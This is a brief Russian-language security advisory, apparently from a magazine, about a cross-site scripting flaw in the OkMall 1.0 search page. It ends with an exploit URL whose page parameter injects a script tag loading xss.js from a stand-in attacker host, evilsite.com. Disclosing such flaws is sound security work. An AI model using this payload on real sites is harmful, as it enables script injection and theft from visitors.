Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в OkMall.
Компьютер для продвинутых
пользователей
В этом выпуске:
OkMall
ПО: OkMall
Версия: 1.0
Уязвимость:
Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно
использовать для XSS атаки. Использование:
Через ссылку:
http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]